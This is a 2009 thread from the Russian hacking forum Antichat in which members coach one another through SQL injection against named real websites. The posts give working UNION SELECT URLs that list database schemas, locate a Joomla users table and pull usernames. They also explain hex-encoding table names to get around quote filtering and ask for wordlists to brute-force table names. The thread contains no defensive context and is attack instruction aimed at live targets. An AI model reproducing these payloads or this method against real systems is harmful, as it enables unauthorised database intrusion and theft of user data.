Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
29.01.2009, 16:41
|
|
Reservists Of Antichat - Level 6
Регистрация: 05.12.2006
Сообщений: 195
Провел на форуме:
14023893
Репутация:
2163
|
|
je0n, а что там не понятного? смотри, например, в таблице users n записей:
Админ,Бобик,Вовик,Гогик,Дод ик...
предположим group_concat(users) выводит три записи
Админ,Бобик,Вовик
ставим условие where users>'Вовик' (или 0xВовик) => выводится следущие три записи в алфавитном порядке
Ghost0ff,
http://www.rfbd.ru/info.php?id=370®ion=59&rubrika=-9+union+select+1,column_name+from+information_sche ma.columns+where+table_name=0x6a6f735f7573657273--+
select hex('jos_users')
http://k0x.ru/encoder/index.php 1 строчка
Последний раз редактировалось l1ght; 29.01.2009 в 16:52..
|
|
|
29.01.2009, 16:50
|
|
Новичок
Регистрация: 18.11.2008
Сообщений: 28
Провел на форуме:
109973
Репутация:
15
|
|
хм. Я в случае не отображения ставил md5 тоесть 'jos_users' шифровал и подставлял 0xдалее зашифрованное 'jos_users' в какой шифровке вы это мутите?
|
|
|
|
29.01.2009, 16:57
|
|
Познавший АНТИЧАТ
Регистрация: 12.05.2007
Сообщений: 1,235
Провел на форуме:
2238549
Репутация:
1318
|
|
Ghost0ff, при чём тут MD5? Если кавычки фильтруются, то это обходится с помощью 0xZZZZZZZZ, где Z-представление каждого байта слова в шестнадцатиричном эквиваленте... То есть для jos_users (без кавычек) это 0x6A6F735F7573657273
|
|
|
|
29.01.2009, 17:03
|
|
Новичок
Регистрация: 18.11.2008
Сообщений: 28
Провел на форуме:
109973
Репутация:
15
|
|
Все, понял. Спасибо за толковое описание ) трабла №2: http://www.rfbd.ru/info.php?id=370®ion=59&rubrika=-9+union+select+1,username+from+jos_users/* не отображает (Хочу за 1 раз забать все вопросы меня интересующие)
P.S. эти 2 вопроса меня мучали пол жизни
|
|
|
|
29.01.2009, 17:08
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514
Репутация:
3338
|
|
Определяем БД, где таблица jos_users:
Код:
http://www.rfbd.ru/info.php?id=370®ion=59&rubrika=-9+union+select+1,table_schema+from+information_schema.columns+where+table_name=0x6A6F735F7573657273/*
А теперь правильно забираем данные:
Код:
http://www.rfbd.ru/info.php?id=370®ion=59&rubrika=-9+union+select+1,username+from+test.jos_users/*
|
|
|
|
29.01.2009, 17:19
|
|
Познавший АНТИЧАТ
Регистрация: 12.05.2007
Сообщений: 1,235
Провел на форуме:
2238549
Репутация:
1318
|
|
На будущее, когда лазишь по базе, старайся выбирать те таблицы, которые лежат в контексте того юзера, под которым работает бажное приложение:
http://www.rfbd.ru/info.php?id=370®ion=59&rubrika=-9999+UNION+SELECT+1,CONCAT_WS(0x3a,table_schema,ta ble_name)+FROM+information_schema.tables+WHERE+tab le_schema=DATABASE()+LIMIT+0,1--+
|
|
|
|
29.01.2009, 17:36
|
|
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
Провел на форуме:
1469161
Репутация:
142
|
|
http://www.lider-grup.ru/news.php?newsid=-33+union+select+1,2,concat_ws(0x3a,version(),user( ),database()),4/*
Сбрутил только таблицу новостей.У кого есть хорошие словари,пробегитесь =_=,а то я ф панике.
|
|
|
|
29.01.2009, 18:36
|
|
Познавший АНТИЧАТ
Регистрация: 12.03.2008
Сообщений: 1,379
Провел на форуме:
5866479
Репутация:
1809
|
|
Господа, интересуют уязвимости WordPress, что кто может посоветовать?
|
|
|
|
29.01.2009, 18:38
|
|
Познавший АНТИЧАТ
Регистрация: 14.01.2008
Сообщений: 1,165
Провел на форуме:
7229141
Репутация:
3099
|
|
Сообщение от mff
Господа, интересуют уязвимости WordPress, что кто может посоветовать?
милворм 
|
|
|
|
29.01.2009, 18:41
|
|
Познающий
Регистрация: 21.01.2009
Сообщений: 98
Провел на форуме:
227123
Репутация:
122
|
|
Сообщение от Велемир
http://www.lider-grup.ru/news.php?newsid=-33+union+select+1,2,concat_ws(0x3a,version(),user( ),database()),4/*
Сбрутил только таблицу новостей.У кого есть хорошие словари,пробегитесь =_=,а то я ф панике.
а чем брутиш?
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
